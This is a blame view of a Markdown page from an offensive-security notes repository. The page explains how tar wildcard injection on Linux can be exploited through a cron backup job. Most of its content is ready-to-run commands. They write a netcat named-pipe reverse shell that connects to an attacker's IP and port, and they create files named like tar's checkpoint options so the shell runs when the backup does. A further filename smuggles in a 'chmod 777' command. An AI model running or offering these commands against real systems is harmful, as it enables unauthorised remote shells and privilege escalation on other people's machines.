whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/exploit/linux/wildard_exploitation.md

27 lines
879 B
Markdown
Raw Normal View History

second commit
2021-08-23 01:13:54 +02:00
# Wildcard usage
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
bump
2022-02-23 23:55:12 +01:00
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
```
or
second commit
2021-08-23 01:13:54 +02:00
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```
ettercap and binaries
2022-05-05 09:31:18 +02:00
## touched Filename Options
* Give full permissions on all the files
```sh
touch './"";$(chmod 777 *)'
```